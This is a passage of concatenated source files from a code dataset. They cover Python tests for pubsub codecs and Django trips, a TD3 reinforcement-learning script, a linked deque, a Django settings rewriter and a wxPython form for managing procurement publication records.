codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n assert_that(loads(codec.encode(bar=\"baz\")), is_(equal_to({\n \"bar\": \"baz\",\n \"mediaType\": \"application/vnd.globality.pubsub.foo\",\n })))\n\n\ndef test_encode_missing_field():\n \"\"\"\n An invalid message will raise errors.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n assert_that(calling(codec.encode).with_args(baz=\"bar\"), raises(ValidationError))\n\n\ndef test_decode():\n \"\"\"\n A message will be decoded according to its schema.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n message = dumps({\n \"bar\": \"baz\",\n \"mediaType\": \"application/vnd.globality.pubsub.foo\",\n })\n assert_that(codec.decode(message), is_(equal_to({\n \"bar\": \"baz\",\n \"media_type\": \"application/vnd.globality.pubsub.foo\",\n })))\n\n\ndef test_decode_missing_media_type():\n \"\"\"\n An invalid message will raise errors.\n\n \"\"\"\n def loader(metadata):\n return dict(\n pubsub_message_codecs=dict(\n default=FooSchema,\n ),\n )\n\n graph = create_object_graph(\"example\", testing=True, loader=loader)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n message = dumps({\n \"bar\": \"baz\",\n })\n assert_that(calling(codec.decode).with_args(message), raises(ValidationError))\n\n\ndef test_decode_missing_field():\n \"\"\"\n An invalid message will raise errors.\n\n \"\"\"\n graph = create_object_graph(\"example\", testing=True)\n codec = graph.pubsub_message_schema_registry[FooSchema.MEDIA_TYPE]\n message = dumps({\n \"mediaType\": \"application/vnd.globality.pubsub.foo\",\n })\n assert_that(calling(codec.decode).with_args(message), raises(ValidationError))\n","sub_path":"microcosm_pubsub/tests/test_codecs.py","file_name":"test_codecs.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"631251224","text":"# -*- coding: utf-8 -*-\n\"\"\"Run module for TD3 on LunarLanderContinuous-v2.\n\n- Author: Curt Park\n- Contact: curt.park@medipixel.io\n\"\"\"\n\nimport argparse\n\nimport gym\nimport torch\nimport torch.optim as optim\n\nfrom algorithms.common.networks.mlp import MLP\nfrom algorithms.common.noise import GaussianNoise\nfrom algorithms.td3.agent import Agent\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n# hyper parameters\nhyper_params = {\n \"GAMMA\": 0.99,\n \"TAU\": 5e-3,\n \"TARGET_SMOOTHING_NOISE_STD\": 0.2,\n \"TARGET_SMOOTHING_NOISE_CLIP\": 0.5,\n \"DELAYED_UPDATE\": 2,\n \"BUFFER_SIZE\": int(1e6),\n \"BATCH_SIZE\": 100,\n \"LR_ACTOR\": 1e-3,\n \"LR_CRITIC_1\": 1e-3,\n \"LR_CRITIC_2\": 1e-3,\n \"GAUSSIAN_NOISE_MIN_SIGMA\": 0.1,\n \"GAUSSIAN_NOISE_MAX_SIGMA\": 0.1,\n \"GAUSSIAN_NOISE_DECAY_PERIOD\": 1000000,\n \"WEIGHT_DECAY\": 1e-6,\n \"EPOCH\": 50,\n \"INITIAL_RANDOM_ACTION\": int(1e4),\n}\n\n\ndef run(env: gym.Env, args: argparse.Namespace, state_dim: int, action_dim: int):\n \"\"\"Run training or test.\n\n Args:\n env (gym.Env): openAI Gym environment with continuous action space\n args (argparse.Namespace): arguments including training settings\n state_dim (int): dimension of states\n action_dim (int): dimension of actions\n\n \"\"\"\n hidden_sizes_actor = [400, 300]\n hidden_sizes_critic = [400, 300]\n\n # create actor\n actor = MLP(\n input_size=state_dim,\n output_size=action_dim,\n hidden_sizes=hidden_sizes_actor,\n output_activation=torch.tanh,\n ).to(device)\n actor_target = MLP(\n input_size=state_dim,\n output_size=action_dim,\n hidden_sizes=hidden_sizes_actor,\n output_activation=torch.tanh,\n ).to(device)\n actor_target.load_state_dict(actor.state_dict())\n\n # create critic\n critic_1 = MLP(\n input_size=state_dim + action_dim,\n output_size=1,\n hidden_sizes=hidden_sizes_critic,\n ).to(device)\n critic_2 = MLP(\n input_size=state_dim + action_dim,\n output_size=1,\n hidden_sizes=hidden_sizes_critic,\n ).to(device)\n critic_target1 = MLP(\n input_size=state_dim + action_dim,\n output_size=1,\n hidden_sizes=hidden_sizes_critic,\n ).to(device)\n critic_target2 = MLP(\n input_size=state_dim + action_dim,\n output_size=1,\n hidden_sizes=hidden_sizes_critic,\n ).to(device)\n critic_target1.load_state_dict(critic_1.state_dict())\n critic_target2.load_state_dict(critic_2.state_dict())\n\n # create optimizers\n actor_optim = optim.Adam(\n actor.parameters(),\n lr=hyper_params[\"LR_ACTOR\"],\n weight_decay=hyper_params[\"WEIGHT_DECAY\"],\n )\n critic_parameter = list(critic_1.parameters()) + list(critic_2.parameters())\n critic_optim = optim.Adam(\n critic_parameter,\n lr=hyper_params[\"LR_CRITIC_1\"],\n weight_decay=hyper_params[\"WEIGHT_DECAY\"],\n )\n\n # noise instance to make randomness of action\n noise = GaussianNoise(\n hyper_params[\"GAUSSIAN_NOISE_MIN_SIGMA\"],\n hyper_params[\"GAUSSIAN_NOISE_MAX_SIGMA\"],\n hyper_params[\"GAUSSIAN_NOISE_DECAY_PERIOD\"],\n )\n\n # make tuples to create an agent\n models = (actor, actor_target, critic_1, critic_2, critic_target1, critic_target2)\n optims = (actor_optim, critic_optim)\n\n # create an agent\n agent = Agent(env, args, hyper_params, models, optims, noise)\n\n # run\n if args.test:\n agent.test()\n else:\n agent.train()\n","sub_path":"examples/reacher-v2/td3.py","file_name":"td3.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49829106","text":"import sys\r\nsys.path.append(r'../..')\r\n\r\nfrom marketsim._pub import strategy, order, constant\r\n\r\nfrom common import expose\r\n\r\n@expose(\"Noise\", __name__)\r\ndef Noise(ctx):\r\n \r\n ctx.volumeStep = 10\r\n\r\n return [\r\n ctx.makeTrader_A(\r\n strategy.LiquidityProvider(\r\n orderFactory = order.side_price.WithExpiry(\r\n constant(10),\r\n order.side_price.Limit(\r\n volume=constant(2)))),\r\n \"liquidity\"),\r\n \r\n ctx.makeTrader_A(strategy.Noise(), \"noise_ex\"),\r\n ]\r\n","sub_path":"marketsim/samples/try_noise.py","file_name":"try_noise.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"222220709","text":"from django.test import TestCase\nfrom datetime import datetime, date\nfrom models import Trip\n\n# Create your tests here.\nclass TripTestCase(TestCase):\n def setUp(self):\n Trip.objects.create(name=\"London\", \n start_date=date(2017, 5, 24), \n finish_date=date(2017, 9, 24))\n Trip.objects.create(name=\"Moscow\", \n start_date=date(2017, 5, 24), \n finish_date=date(2017, 6, 24))\n \n def test_getTripName(self):\n trip = Trip.objects.get(name=\"London\")\n self.assertEqual(trip.getTripName(), \"London\")\n \n def test_getTriStartDate(self):\n trip = Trip.objects.get(name=\"London\")\n self.assertEqual(trip.getTripStartDate(), date(2017, 5, 24))\n \n def test_getTripFinishDate(self):\n trip = Trip.objects.get(name=\"London\")\n self.assertEqual(trip.getTripFinishDate(), date(2017, 9, 24))","sub_path":"trips/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"557487898","text":"#! python3\n\nimport sys\nfrom pathlib import Path\nimport re\n\ndefault_db_block = '''DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}'''\n\nreplacement_db_block = '''DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.environ.get('POSTGRES_DATABASE'),\n 'USER': os.environ.get('POSTGRES_USER'),\n 'PASSWORD': os.environ.get('POSTGRES_PASSWORD'),\n 'HOST': os.environ.get('POSTGRES_DOCKER_HOST'),\n 'PORT': os.environ.get('POSTGRES_PORT'),\n }\n}'''\n\nsubst_starts_with = [\n 'SECRET_KEY',\n 'DEBUG',\n 'ALLOWED_HOSTS'\n]\n\n\ndef substitute_text(text):\n text = text.replace(default_db_block, replacement_db_block)\n for key in subst_starts_with:\n temp = re.subn(r'{}.*\\n'.format(key),\n f\"{key} = os.environ['{key}']\", text)[0]\n if key == 'ALLOWED_HOSTS':\n temp = re.subn(\n r'{}.*\\n'.format(key),\n f\"{key} = os.environ['{key}'].split(',')\", text)[0]\n text = temp\n text += \"MEDIA_ROOT = os.path.join(BASE_DIR, 'media')\\n\"\n text += \"MEDIA_URL = '/media/'\\n\"\n text += \"STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\\n\"\n return text\n\n\nif __name__ == '__main__':\n path = Path(sys.argv[1])\n in_text = path.read_text()\n rep_text = substitute_text(in_text)\n path.write_text(rep_text)\n print(f'replacements saved in file {path}')\n","sub_path":"replace/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12493182","text":"from DoublyLinkedBase import _DoublyLinkedBase\n\n\nclass Empty(Exception):\n pass\n\nclass LinkedDeque(_DoublyLinkedBase):\n \"\"\"Double-ended queue implementation based on a doubly linked list.\n \"\"\"\n def first(self):\n if self.is_empty():\n raise Empty(\"Deque is empty\")\n return self._header._next._element\n \n def last(self):\n if self.is_empty():\n raise Empty(\"Deque is empty\")\n return self._tailer._prev._element\n\n def insert_first(self, e):\n return self._insert_between(e, self._header, self._header._next)\n\n def insert_last(self, e):\n return self._insert_between(e, self._tailer._prev, self._tailer)\n \n def delete_first(self):\n if self.is_empty():\n raise Empty(\"Deque is empty\")\n return self._delete_node(self._header._next)\n\n def delete_last(self):\n if self.is_empty():\n raise Empty(\"Deque is empty\")\n return self._delete_node(self._tailer._prev)\n\n\nif __name__ == '__main__':\n ld = LinkedDeque()\n ld.insert_first(1)\n ld.insert_last(2)\n ld.insert_last(3)\n print(ld)\n print(ld.first())\n print(ld.last())\n ld.delete_first()\n print(ld)\n","sub_path":"src/data-structures/doubly-linked-list/LinkedDeque.py","file_name":"LinkedDeque.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472012800","text":"import cv2\nfrom DSBoard import Board\n\n\ndef display_moves():\n moves = board.get_possible_moves()\n\n for p in moves:\n print(\"----------------\")\n for m in p:\n print(m)\n\n\nboard = Board()\n\n\ncount = 0\nfor i in range(15):\n moves = board.get_possible_moves(randomize=True)\n print(\"**\")\n for p in moves:\n print(p)\n print(\"*\")\n m = moves[i%2][0]\n board.make_move_for_player(m, i%2)\n board.show_board()\n print(board)\n print(\"--------------\")\n cv2.waitKey(0)\n\n# print(board)\n# board.show_board()\n# display_moves()\n#\n# board.make_move_for_player([[4,3],2],0)\n# print(board)\n# board.show_board()\n# display_moves()\n#\n# board.make_move_for_player([[3,6],7],1)\n# print(board)\n# board.show_board()\n# display_moves()\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"DoubleSnake/BoardTest.py","file_name":"BoardTest.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"92936623","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : main.py\n@Author : Brandon Han\n@Contact : hxiao@zju.edu.cn\n@Time : 2019/11/25 20:03 \n\"\"\"\n\nimport argparse\nfrom utils.model_related import Params, make_figure_dir\nfrom train_and_test import *\n\nparser = argparse.ArgumentParser(description='U-RISC training routine')\nparser.add_argument('--train_data_path', type=str, default='data_input/simple/train/',\n help='path to train data')\nparser.add_argument('--train_label_path', type=str, default='data_input/simple/labels/train/',\n help='path to train ground truth label')\nparser.add_argument('--val_data_path', type=str, default='data_input/simple/val/',\n help='path to val data')\nparser.add_argument('--val_label_path', type=str, default='data_input/simple/val/',\n help='path to val ground truth label')\nparser.add_argument('--save_folder', type=str, default=\"models/\", help='path to save models')\nparser.add_argument('--restore_from', default=None, type=str,\n help='path to load fully-trained models, like checkpoint/pre-trained model')\nparser.add_argument('--json_path', default='params.json', type=str, help='path to configuration json')\nparser.add_argument('--test', action='store_true', default=False, help='type it for test process')\nargs = parser.parse_args()\n\n# Load parameters from json file\nassert os.path.exists(args.json_path), \"No json file found!\"\nparams = Params(args.json_path)\nparams.restore_from = args.restore_from\nparams.save_folder = args.save_folder\nparams.train_data_path = args.train_data_path\nparams.train_label_path = args.train_label_path\nparams.val_data_path = args.val_data_path\nparams.val_label_path = args.val_label_path\nparams.cuda = torch.cuda.is_available()\n\n# make_figure_dir()\n\nif __name__ == '__main__':\n if args.test:\n test_model(params)\n else:\n train_model(params)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"273075542","text":"# -*- coding: utf-8 -*-\n\nimport wx\nfrom wx.lib import masked\nimport datetime\nfrom models import *\nimport sys\nimport os\nimport codecs\nfrom sqlalchemy import func\n\nsetup_all()\n\nID_TOOLBAR_PUBLICACAO_NOVO = 5001\nID_TOOLBAR_PUBLICACAO_EDITAR = 5002\nID_TOOLBAR_PUBLICACAO_EXCLUIR = 5003\nID_TOOLBAR_PUBLICACAO_CRIAR_ARQUIVO = 5004\n\n\nclass WindowPublicacao(wx.MiniFrame):\n\n def __init__(self, parent):\n\n wx.MiniFrame.__init__(self, parent, id=wx.ID_ANY, size=(530, 300), pos=(300, 170), title=u\"Publicação\", style= wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN)\n self.panelPublicacao = wx.Panel(self, wx.ID_ANY)\n\n self.vbox1 = wx.BoxSizer(wx.VERTICAL)\n\n self.toolBar = wx.ToolBar(self, id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.DefaultSize, style=wx.TB_TEXT)\n\n self.toolBar.AddLabelTool(ID_TOOLBAR_PUBLICACAO_NOVO, \"Novo\", wx.Bitmap(\"./imagens/add.png\"), shortHelp=u'Adiciona nova publicação')\n self.toolBar.AddSeparator()\n self.toolBar.AddLabelTool(ID_TOOLBAR_PUBLICACAO_EDITAR, \"Editar\", wx.Bitmap(\"./imagens/edit.png\"), shortHelp=u'Edita publicação selecionada')\n self.toolBar.AddSeparator()\n self.toolBar.AddLabelTool(ID_TOOLBAR_PUBLICACAO_EXCLUIR, \"Remover\", wx.Bitmap(\"./imagens/remove.png\"), shortHelp=u'Exclui publicação selecionada')\n self.toolBar.AddSeparator()\n self.toolBar.AddLabelTool(ID_TOOLBAR_PUBLICACAO_CRIAR_ARQUIVO, \"Gerar Arquivo\", wx.Bitmap(\"./imagens/file.png\"), shortHelp=u'Gera arquivo de publicação')\n self.toolBar.AddSeparator()\n self.toolBar.AddSeparator()\n self.toolBar.Realize()\n self.SetToolBar(self.toolBar)\n\n self.choicesCompetencias = [u'Orçamento', u'Janeiro', u'Fevereiro', u'Março', u'Abril', u'Maio', u'Junho', u'Julho', u'Agosto', u'Setembro',\n u'Outubro', u'Novembro', u'Dezembro'\n ]\n\n self.cbCompetenciaForView = wx.ComboBox(self.panelPublicacao, -1, pos=(1, 5), size=(200, -1), choices=self.choicesCompetencias, style=wx.CB_READONLY)\n self.cbCompetenciaForView.Bind(wx.EVT_COMBOBOX, self.insereInCtrList)\n\n #ListCtrl\n self.hbox1 = wx.BoxSizer(wx.HORIZONTAL)\n self.publicacaoListCtrl = wx.ListCtrl(self.panelPublicacao, wx.ID_ANY, pos=(0, 30), size=(525, 200), style=wx.LC_REPORT)\n self.publicacaoListCtrl.InsertColumn(0, u'Licitação', width=150)\n self.publicacaoListCtrl.InsertColumn(1, u'Data Publicação', width=200)\n self.publicacaoListCtrl.InsertColumn(2, u'Veículo', width=170)\n self.publicacaoListCtrl.InsertColumn(3, u'', width=0)\n self.publicacaoListCtrl.Bind(wx.EVT_LIST_ITEM_SELECTED, self.capturaIdItemSelecionado)\n self.publicacaoListCtrl.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.anulaIdItemSelecionado)\n self.idSelecionado = None\n\n self.hbox1.Add(self.publicacaoListCtrl, 1, wx.EXPAND)\n #Fim ListCtrl\n\n #Binds\n self.Bind(wx.EVT_MENU, self.novoPublicacao, id=ID_TOOLBAR_PUBLICACAO_NOVO)\n self.Bind(wx.EVT_MENU, lambda event: self.vizualizaPublicacao(event, self.idSelecionado), id=ID_TOOLBAR_PUBLICACAO_EDITAR)\n self.Bind(wx.EVT_MENU, lambda event: self.excluiPublicacao(event, self.idSelecionado), id=ID_TOOLBAR_PUBLICACAO_EXCLUIR)\n self.Bind(wx.EVT_MENU, self.geraArquivoWindow, id=ID_TOOLBAR_PUBLICACAO_CRIAR_ARQUIVO)\n self.Bind(wx.EVT_CLOSE, self.quit)\n #Fim Binds\n\n self.Centre()\n self.MakeModal(True)\n self.Show()\n\n def quit(self, event):\n\n self.MakeModal(False)\n self.Destroy()\n\n def anulaIdItemSelecionado(self, event):\n\n self.idSelecionado = None\n\n def capturaIdItemSelecionado(self, event):\n\n self.idSelecionado = self.publicacaoListCtrl.GetItem(event.GetIndex(), 3).GetText()\n\n def toolBarControler(self, novo=True, editar=True, remover=True, gerar=True):\n\n self.toolBar.EnableTool(ID_TOOLBAR_PUBLICACAO_NOVO, novo)\n self.toolBar.EnableTool(ID_TOOLBAR_PUBLICACAO_EDITAR, editar)\n self.toolBar.EnableTool(ID_TOOLBAR_PUBLICACAO_EXCLUIR, remover)\n self.toolBar.EnableTool(ID_TOOLBAR_PUBLICACAO_CRIAR_ARQUIVO, gerar)\n\n def insereInCtrList(self, event):\n\n self.publicacaoListCtrl.DeleteAllItems()\n\n if self.cbCompetenciaForView.GetSelection() != -1:\n publicacoes = Publicacao.query.filter_by(competencia=self.cbCompetenciaForView.GetValue()).all()\n\n for publicacao in publicacoes:\n\n index = self.publicacaoListCtrl.InsertStringItem(sys.maxint, unicode(publicacao.numeroProcesso))\n self.publicacaoListCtrl.SetStringItem(index, 1, publicacao.dataPublicacao)\n self.publicacaoListCtrl.SetStringItem(index, 2, publicacao.veiculoComunicacao)\n self.publicacaoListCtrl.SetStringItem(index, 3, unicode(publicacao.id))\n\n def novoPublicacao(self, event):\n\n self.toolBarControler(False, False, False, False)\n\n self.windowNovopublicacao = wx.MiniFrame(parent=self, id=wx.ID_ANY, size=(500, 270), pos=(300, 170), title=u'Novo - Publicação', style= wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN)\n self.panelNovoPublicacao = wx.Panel(self.windowNovopublicacao, wx.ID_ANY)\n\n self.tcId = wx.TextCtrl(self.panelNovoPublicacao, -1, pos=(0, 0), size=(0, 0))\n self.tcId.SetValue('0')\n\n self.stCompetencia = wx.StaticText(self.panelNovoPublicacao, -1, u'Competência', pos=(10, 5))\n self.cbCompetencia = wx.ComboBox(self.panelNovoPublicacao, -1, pos=(10, 25), size=(200, -1), choices=self.choicesCompetencias, style=wx.CB_READONLY)\n self.cbCompetencia.Bind(wx.EVT_COMBOBOX, self.insereNumeroProcesso)\n\n wx.StaticBox(self.panelNovoPublicacao, -1, pos=(5, 50), size=(480, 140))\n\n self.stNumeroProcesso = wx.StaticText(self.panelNovoPublicacao, -1, u'Número Proc. Licitatório', pos=(10, 70))\n self.cbNumeroProcesso = wx.ComboBox(self.panelNovoPublicacao, -1, pos=(10, 90), size=(100, -1), style=wx.CB_READONLY)\n\n self.stDataPublicacao = wx.StaticText(self.panelNovoPublicacao, -1, u'Data Publicação', pos=(160, 70))\n self.tcDataPublicacao = masked.TextCtrl(self.panelNovoPublicacao, -1, mask=\"##/##/####\")\n self.tcDataPublicacao.SetSize((80, -1))\n self.tcDataPublicacao.SetPosition((160, 90))\n \n self.stVeiculoComunicacao = wx.StaticText(self.panelNovoPublicacao, -1, u'Veículo de Comunicação', pos=(10, 130))\n self.tcVeiculoComunicacao = wx.TextCtrl(self.panelNovoPublicacao, -1, pos=(10, 150), size=(320, -1), style=wx.ALIGN_LEFT)\n self.tcVeiculoComunicacao.SetMaxLength(50)\n\n self.btnSalvar = wx.Button(self.panelNovoPublicacao, -1, u\"Salvar\", pos=(150, 210))\n self.btnSalvar.Bind(wx.EVT_BUTTON, self.salvarPublicacao)\n self.btnCancelar = wx.Button(self.panelNovoPublicacao, -1, u\"Cancelar\", pos=(250, 210))\n self.btnCancelar.Bind(wx.EVT_BUTTON, self.quitNovoPublicacao)\n\n #Bind\n self.windowNovopublicacao.Bind(wx.EVT_CLOSE, self.quitNovoPublicacao)\n\n self.windowNovopublicacao.Centre()\n self.windowNovopublicacao.Show()\n\n def quitNovoPublicacao(self, event):\n\n self.toolBarControler(True, True, True, True)\n self.windowNovopublicacao.Destroy()\n\n def insereNumeroProcesso(self, event):\n\n self.cbNumeroProcesso.Clear()\n\n licitacoes = Licitacao.query.filter_by(competencia=self.cbCompetencia.GetValue()).all()\n\n if not licitacoes:\n self.message = wx.MessageDialog(None, u'Não existe Licitações para a competência selecionada!', 'Info', wx.OK)\n self.message.ShowModal()\n self.cnNumeroProcesso.Disable()\n\n else:\n for licitacao in licitacoes:\n\n self.cbNumeroProcesso.Append(unicode(licitacao.numeroProcessoLicitatorio))\n\n self.cbNumeroProcesso.Enable()\n\n def validateDate(self, date, field):\n\n if date == \" / / \":\n self.message = wx.MessageDialog(None, u'O campo '+field+' deve ser preenchido!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if date[0:2] == ' ':\n self.message = wx.MessageDialog(None, u'Preencha o dia no campo '+field, 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if date[3:5] == ' ':\n self.message = wx.MessageDialog(None, u'Preencha o mês no campo '+field, 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if date[6:] == ' ':\n self.message = wx.MessageDialog(None, u'Preencha o ano no campo '+field, 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if int(date[0:2]) < 1 or int(date[0:2]) > 31:\n self.message = wx.MessageDialog(None, u'No campo '+field+u' o dia deve estar entre 1 e 31!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if int(date[3:5]) < 1 or int(date[3:5]) > 12:\n self.message = wx.MessageDialog(None, u'No campo '+field+u' o mês deve estar entre 1 e 12!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if int(date[6:]) < 1900:\n self.message = wx.MessageDialog(None, u'No campo '+field+u' o ano deve estar no formato de quatro dígitos!E ser maior que 1900!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n if int(date[3:5]) == 2:\n if int(date[0:2]) > 29:\n self.message = wx.MessageDialog(None, u'Campo: '+field+u'\\nNo mês de Fevereiro nunca tem um dia maior que 29!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n else:\n try:\n datetime.date(int(date[6:10]), int(date[3:5]), int(date[0:2]))\n except ValueError:\n self.message = wx.MessageDialog(None, u'Campo: '+field+u'\\nEste ano Fevereiro não possui o dia 29!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n return 1\n\n def valida(self):\n\n if self.cbCompetencia.GetSelection() == -1:\n\n self.message = wx.MessageDialog(None, u'Selecione uma opção no campo Competência', 'Info', wx.OK)\n self.cbCompetencia.SetFocus()\n self.message.ShowModal()\n return 0\n\n if self.cbNumeroProcesso.GetSelection() == -1:\n\n self.message = wx.MessageDialog(None, u'Selecione uma opção no campo Número Proc. Licitatório', 'Info', wx.OK)\n self.cbNumeroProcesso.SetFocus()\n self.message.ShowModal()\n return 0\n \n if not self.validateDate(self.tcDataPublicacao.GetValue(), u\"Data Publicação\"):\n self.tcDataPublicacao.SelectAll()\n self.tcDataPublicacao.SetFocus()\n return 0\n\n if self.tcVeiculoComunicacao.GetValue() == u'':\n\n self.message = wx.MessageDialog(None, u'O campo Veículo de Comunicação deve ser preenchido!', 'Info', wx.OK)\n self.tcVeiculoComunicacao.SetFocus()\n self.message.ShowModal()\n return 0\n\n return 1\n\n def salvarPublicacao(self, event):\n\n if self.valida():\n\n Publicacao(numeroProcesso=unicode(self.cbNumeroProcesso.GetValue()),\n dataPublicacao=unicode(self.tcDataPublicacao.GetValue()),\n veiculoComunicacao=unicode(self.tcVeiculoComunicacao.GetValue()),\n competencia=unicode(self.cbCompetencia.GetValue())\n )\n\n session.commit()\n self.message = wx.MessageDialog(None, u'Publicação salva com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n self.insereInCtrList(None)\n self.quitNovoPublicacao(None)\n\n \n def vizualizaPublicacao(self, event, idPublicacao):\n\n if idPublicacao is None:\n self.message = wx.MessageDialog(None, u'Nenhuma publicação foi selecionada! Selecione uma na lista!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n self.publicacao = Publicacao.query.filter_by(id=idPublicacao).first()\n\n self.toolBarControler(False, False, False, False)\n\n self.windowVizualizapublicacao = wx.MiniFrame(parent=self, id=wx.ID_ANY, size=(500, 270), pos=(300, 170), title=u'Editar - Publicação', style= wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN)\n self.panelVizualizaPublicacao = wx.Panel(self.windowVizualizapublicacao, wx.ID_ANY)\n\n self.tcId = wx.TextCtrl(self.panelVizualizaPublicacao, -1, pos=(0, 0), size=(0, 0))\n self.tcId.SetValue(unicode(self.publicacao.id))\n\n self.stCompetencia = wx.StaticText(self.panelVizualizaPublicacao, -1, u'Competência', pos=(10, 5))\n self.cbCompetencia = wx.ComboBox(self.panelVizualizaPublicacao, -1, pos=(10, 25), size=(200, -1), choices=self.choicesCompetencias, style=wx.CB_READONLY)\n self.cbCompetencia.Bind(wx.EVT_COMBOBOX, self.insereNumeroProcesso)\n self.cbCompetencia.SetValue(self.publicacao.competencia)\n\n wx.StaticBox(self.panelVizualizaPublicacao, -1, pos=(5, 50), size=(480, 140))\n\n self.stNumeroProcesso = wx.StaticText(self.panelVizualizaPublicacao, -1, u'Número Proc. Licitatório', pos=(10, 70))\n self.cbNumeroProcesso = wx.ComboBox(self.panelVizualizaPublicacao, -1, pos=(10, 90), size=(100, -1), style=wx.CB_READONLY)\n self.insereNumeroProcesso(None)\n self.cbNumeroProcesso.SetValue(self.publicacao.numeroProcesso)\n\n self.stDataPublicacao = wx.StaticText(self.panelVizualizaPublicacao, -1, u'Data Publicação', pos=(160, 70))\n self.tcDataPublicacao = masked.TextCtrl(self.panelVizualizaPublicacao, -1, mask=\"##/##/####\")\n self.tcDataPublicacao.SetSize((80, -1))\n self.tcDataPublicacao.SetPosition((160, 90))\n #self.tcDataPublicacao.Bind(wx.EVT_KILL_FOCUS, self.adicionaSequencia)\n self.tcDataPublicacao.SetValue(self.publicacao.dataPublicacao)\n \n self.stVeiculoComunicacao = wx.StaticText(self.panelVizualizaPublicacao, -1, u'Veículo de Comunicação', pos=(10, 130))\n self.tcVeiculoComunicacao = wx.TextCtrl(self.panelVizualizaPublicacao, -1, pos=(10, 150), size=(320, -1), style=wx.ALIGN_LEFT)\n self.tcVeiculoComunicacao.SetMaxLength(50)\n self.tcVeiculoComunicacao.SetValue(self.publicacao.veiculoComunicacao)\n\n self.btnSalvar = wx.Button(self.panelVizualizaPublicacao, -1, u\"Alterar\", pos=(150, 210))\n self.btnSalvar.Bind(wx.EVT_BUTTON, self.editarPublicacao)\n self.btnCancelar = wx.Button(self.panelVizualizaPublicacao, -1, u\"Cancelar\", pos=(250, 210))\n self.btnCancelar.Bind(wx.EVT_BUTTON, self.quitVizualizaPublicacao)\n\n #Bind\n self.windowVizualizapublicacao.Bind(wx.EVT_CLOSE, self.quitNovoPublicacao)\n\n self.windowVizualizapublicacao.Centre()\n self.windowVizualizapublicacao.Show()\n\n def quitVizualizaPublicacao(self, event):\n\n self.toolBarControler(True, True, True, True)\n self.windowVizualizapublicacao.Destroy()\n\n def editarPublicacao(self, event):\n\n if self.valida():\n\n self.publicacao.numeroProcesso = unicode(self.cbNumeroProcesso.GetValue())\n self.publicacao.dataPublicacao = unicode(self.tcDataPublicacao.GetValue())\n self.publicacao.veiculoComunicacao = unicode(self.tcVeiculoComunicacao.GetValue())\n self.publicacao.competencia = unicode(self.cbCompetencia.GetValue())\n\n session.commit()\n self.message = wx.MessageDialog(None, u'Publicação alterada com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n self.insereInCtrList(None)\n self.quitVizualizaPublicacao(None)\n\n def excluiPublicacao(self, event, idPublicacao):\n\n if idPublicacao is None:\n self.message = wx.MessageDialog(None, u'Selecione um item na lista!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n\n remove_dial = wx.MessageDialog(None, u'Tem certeza que deseja excluir esta publicação?', u'Excluir - Publicação', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)\n ret = remove_dial.ShowModal()\n if ret == wx.ID_YES:\n self.publicacao = Publicacao.query.filter_by(id=idPublicacao).first()\n self.publicacao.delete()\n session.commit()\n self.insereInCtrList(None)\n self.anulaIdItemSelecionado(None)\n self.message = wx.MessageDialog(None, u'Publicação excluída com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n\n def geraArquivoWindow(self, event):\n\n self.toolBarControler(False, False, False, False)\n\n self.windowGeraArquivo = wx.MiniFrame(parent=self, id=wx.ID_ANY, size=(680, 470), pos=(300, 170), title=u\"Gerar Arquivo 